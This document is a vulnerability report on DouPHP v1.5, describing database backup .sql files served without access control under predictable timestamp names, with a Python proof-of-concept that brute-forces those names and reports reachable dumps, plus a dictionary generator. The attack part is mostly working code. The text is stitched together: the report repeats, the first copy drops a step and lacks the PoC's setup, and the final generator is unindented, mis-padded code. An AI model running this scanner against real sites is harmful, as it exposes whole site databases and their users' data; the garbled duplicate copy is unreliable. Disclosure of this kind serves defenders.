In the latest version of DouPHP (v1.5 Release 20190516), the admin back-end can back up the whole site's database, but the generated backup file is not protected by any access control, so any unauthenticated user who knows or guesses its name can view or download the database dump.
1、Log in to the admin back-end and run the data backup function; it writes a .sql file whose name is derived from the current date and time.
3、Any user can request the backup file's path directly by URL, without logging in, and view or download the backup.
4、The backup file name is built from the current date and time (format DYYYYMMDDTHHMMSS).
5、Following ROOT_PATH into the core code shows that no access restriction is applied to the backup directory, which is the vulnerability. Because the file name is a predictable timestamp, it can be brute-forced second by second over the hour the backup was taken (that is what the PoC below does); backups should be stored outside the web root, or the directory denied by the web server, and named with an unguessable token.
6、PoC (dict.txt must be generated beforehand with the time-format dictionary script in step 7).
import urllib.request
import time
import threading
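def search_url(url, txt):
    """Build candidate backup URLs from a dictionary file and queue them in ``all_url``.

    Each non-empty line of *txt* is a file-name stem such as ``D20190522T154247``;
    it is joined to *url* with the ``.sql`` suffix DouPHP gives its backups.

    Args:
        url: Base URL of the backup directory (expected to end with ``/``).
        txt: Path of the dictionary file, one stem per line.

    Returns:
        The list of candidate URLs. The same entries are appended to the
        module-level ``all_url`` list, which is what main() consumes.
    """
    candidates = []
    with open(txt, 'r') as f:
        for line in f:
            # strip() rather than replace('\n', '') so CRLF dictionaries and
            # trailing spaces do not yield stems like 'D2019...\r.sql'
            stem = line.strip()
            if not stem:
                continue  # a blank line would otherwise request '<url>.sql'
            candidates.append(url + stem + '.sql')
    all_url.extend(candidates)
    return candidates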
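def handle_url(urllist):
    """Probe one candidate URL; record it in ``open_url`` if the server serves it.

    An existing backup is answered with 200 (304 if a cache validator matched);
    a missing one makes urlopen raise HTTPError, which is counted as "absent".

    Args:
        urllist: Absolute URL of one candidate ``.sql`` file.

    Returns:
        True if the URL was recorded as reachable, else False.
    """
    import urllib.error

    print("Find:" + urllist + '\n')
    try:
        with urllib.request.urlopen(urllist) as resp:
            code = resp.getcode()
    except urllib.error.HTTPError:
        return False  # 404/403 etc.: the expected outcome for most stems
    except Exception as exc:  # network error, bad URL: report, don't abort the scan
        print("[!]" + urllist + ": " + str(exc) + '\n')
        return False
    # The original test `code == 200 or 304` was always true (304 is truthy)
    # and recorded a 304 twice; compare both codes explicitly.
    if code not in (200, 304):
        return False
    # NOTE: urlopen follows redirects, so a site that redirects unknown paths
    # to a 200 page will report every stem; check the body looks like SQL then.
    open_url.append(urllist)
    print("[+]Find file:" + urllist + '\n')
    return True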
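def main():
    """Build the candidate list, probe every URL concurrently and report hits.

    Reads the module-level ``url`` and ``txt`` settings, fills ``all_url`` via
    search_url(), runs handle_url() on each candidate from a bounded thread
    pool, then prints whatever landed in ``open_url``.
    """
    from concurrent.futures import ThreadPoolExecutor

    search_url(url, txt)
    # One thread per dictionary entry (the original) spawns thousands of
    # threads for an hour-sized dictionary; a small pool probes just as fast
    # without exhausting local descriptors or flooding the target.
    with ThreadPoolExecutor(max_workers=16) as pool:
        list(pool.map(handle_url, all_url))
    if open_url:
        print("Successful scan, successful url::")
        for each in open_url:
            print("[+]" + each)
    else:
        print("No backup file found (the dictionary may not cover the backup's timestamp)")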
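if __name__ == "__main__":
    # The rendered issue lost the underscores in `if name=="main":`, which
    # raises NameError; this is the real entry-point guard.
    # time.clock() was removed in Python 3.8; perf_counter() is the replacement.
    start = time.perf_counter()
    main()
    end = time.perf_counter()
    print("The function spend time is %.3f seconds" % (end - start))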
7、Script to generate a dictionary of backup file-name stems for a given date and hour range.
import time
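# Can be customized: which hours of today's date to enumerate.
HOURS = range(15, 16)


def _candidates(day, hours):
    """Return every ``D<day>T<HHMMSS>`` stem for the given hours of *day*.

    DouPHP names backups after the creation time (e.g. ``D20190522T154247``),
    so the search space for one hour is 60 * 60 second-granular stems.

    Args:
        day: The ``%Y%m%d`` part, e.g. ``"20190522"``.
        hours: Iterable of hour numbers (0-23) to expand.

    Returns:
        List of stems, every field zero-padded to two digits, in chronological order.
    """
    # %02d padding replaces the original hand-written branch ladder, which
    # mis-padded many combinations (e.g. 15:00:05 became 'T1505') and looped
    # 0..60 inclusive, producing impossible minute/second values.
    return [
        "D%sT%02d%02d%02d" % (day, h, m, s)
        for h in hours
        for m in range(60)
        for s in range(60)
    ]


if __name__ == "__main__":
    today = time.strftime('%Y%m%d', time.localtime(time.time()))
    for stem in _candidates(today, HOURS):
        print(stem)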
In the latest version of DouPHP (v1.5 Release 20190516), the admin back-end can back up the whole site's database, but the generated backup file is not protected by any access control, so any unauthenticated user who knows or guesses its name can view or download the database dump.
1、Log in to the admin back-end and run the data backup function; it writes a .sql file whose name is derived from the current date and time.
2、Look at the path where the backup file is written, e.g. http://url/data/backup/D20190522T154247.sql
3、Any user can request the backup file's path directly by URL, without logging in, and view or download the backup.
4、The backup file name is built from the current date and time (format DYYYYMMDDTHHMMSS).

5、Following ROOT_PATH into the core code shows that no access restriction is applied to the backup directory, which is the vulnerability. Because the file name is a predictable timestamp, it can be brute-forced second by second over the hour the backup was taken (that is what the PoC below does); backups should be stored outside the web root, or the directory denied by the web server, and named with an unguessable token.
6、PoC (dict.txt must be generated beforehand with the time-format dictionary script in step 7).
import urllib.request
import time
import threading
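url = input("url:")
# Dictionary stems are appended directly to this base, so it must end with '/'
# (e.g. http://host/data/backup/); add it if the operator left it off.
if not url.endswith('/'):
    url += '/'
txt = input("dict(dict.txt):")
open_url = []   # candidates that answered 200/304
all_url = []    # every candidate URL built from the dictionary
threads = []    # worker threads, if main() chooses to spawn them
# Can be customized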
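def search_url(url, txt):
    """Build candidate backup URLs from a dictionary file and queue them in ``all_url``.

    Each non-empty line of *txt* is a file-name stem such as ``D20190522T154247``;
    it is joined to *url* with the ``.sql`` suffix DouPHP gives its backups.

    Args:
        url: Base URL of the backup directory (expected to end with ``/``).
        txt: Path of the dictionary file, one stem per line.

    Returns:
        The list of candidate URLs. The same entries are appended to the
        module-level ``all_url`` list, which is what main() consumes.
    """
    candidates = []
    with open(txt, 'r') as f:
        for line in f:
            # strip() rather than replace('\n', '') so CRLF dictionaries and
            # trailing spaces do not yield stems like 'D2019...\r.sql'
            stem = line.strip()
            if not stem:
                continue  # a blank line would otherwise request '<url>.sql'
            candidates.append(url + stem + '.sql')
    all_url.extend(candidates)
    return candidates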
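def handle_url(urllist):
    """Probe one candidate URL; record it in ``open_url`` if the server serves it.

    An existing backup is answered with 200 (304 if a cache validator matched);
    a missing one makes urlopen raise HTTPError, which is counted as "absent".

    Args:
        urllist: Absolute URL of one candidate ``.sql`` file.

    Returns:
        True if the URL was recorded as reachable, else False.
    """
    import urllib.error

    print("Find:" + urllist + '\n')
    try:
        with urllib.request.urlopen(urllist) as resp:
            code = resp.getcode()
    except urllib.error.HTTPError:
        return False  # 404/403 etc.: the expected outcome for most stems
    except Exception as exc:  # network error, bad URL: report, don't abort the scan
        print("[!]" + urllist + ": " + str(exc) + '\n')
        return False
    # The original test `code == 200 or 304` was always true (304 is truthy)
    # and recorded a 304 twice; compare both codes explicitly.
    if code not in (200, 304):
        return False
    # NOTE: urlopen follows redirects, so a site that redirects unknown paths
    # to a 200 page will report every stem; check the body looks like SQL then.
    open_url.append(urllist)
    print("[+]Find file:" + urllist + '\n')
    return True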
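def main():
    """Build the candidate list, probe every URL concurrently and report hits.

    As written, this copy of main() only called search_url() and never probed
    anything, so the PoC could not report a result. It now matches the full
    version of the script: fill ``all_url``, run handle_url() on each
    candidate from a bounded thread pool, then print whatever landed in
    ``open_url``.
    """
    from concurrent.futures import ThreadPoolExecutor

    search_url(url, txt)
    # A small pool probes quickly without spawning one thread per stem.
    with ThreadPoolExecutor(max_workers=16) as pool:
        list(pool.map(handle_url, all_url))
    if open_url:
        print("Successful scan, successful url::")
        for each in open_url:
            print("[+]" + each)
    else:
        print("No backup file found (the dictionary may not cover the backup's timestamp)")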
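if __name__ == "__main__":
    # The rendered issue lost the underscores in `if name=="main":`, which
    # raises NameError; this is the real entry-point guard.
    # time.clock() was removed in Python 3.8; perf_counter() is the replacement.
    start = time.perf_counter()
    main()
    end = time.perf_counter()
    print("The function spend time is %.3f seconds" % (end - start))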
7、Script to generate a dictionary of backup file-name stems for a given date and hour range.
import time
#Can be customized
for h in range(15,16):
for i in range(0,61):
for s in range(0,61):
if(h==0 and i==0 and s==0):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s)+'0',time.localtime(time.time()))
# print(data)
elif h==0 and i==0 and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>=10) and (s>0 and s<9):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time()))
elif i==0 and s==0 and (h>0 and h<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and ((i>0 and i<10)) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and s==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
elif (h>0 and h<10) and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)